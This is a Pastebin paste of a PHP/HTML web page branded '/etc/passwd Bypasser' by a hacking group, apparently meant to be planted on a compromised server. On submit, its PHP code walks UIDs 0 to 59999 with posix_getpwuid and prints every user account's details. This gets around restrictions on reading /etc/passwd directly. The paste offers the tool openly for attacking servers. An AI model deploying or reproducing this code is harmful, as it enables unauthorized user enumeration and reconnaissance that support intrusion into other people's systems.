Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title>/etc/Passwd Bypass Tool By CyberTeamRox </title>
- <body background="https://pbs.twimg.com/profile_images/576236156573995008/MBmY1005.jpg" bgcolor="black">
- <form>
- <p align="center" dir="rtl"><font color="#008080">
- <center><font color="red" face="Tahoma"><h1>/etc/passwd Bypasser </h1></font></a></font><font color="red">
- <font color="red"><span lang="ar-sa">
- </form>
- <form>
- <center><td width="50%"><font color=red>users in server:<font color="black">ÞÇÆãå ÇáíæÒÑÇÊ ÈÇáÓíÑÝÑ</font></font></td>
- <td width="50%"><select size=\"1\" name="plugin"><option value="plugin">/etc/passwd</option></option></select></td>
- <td width="100%" colspan="2">
- <p align="center"><input type="submit" value="Submit"></td>
- </form>
- <textarea method='POST' rows=20 cols=100 wrap=off>
- <?php
- error_reporting(0);
- if ($_GET['plugin'] )
- for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list ($key, $val) = each($ara)){
- print "$val:";
- }
- print "\n";
- }
- }
- echo "</textarea>";
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement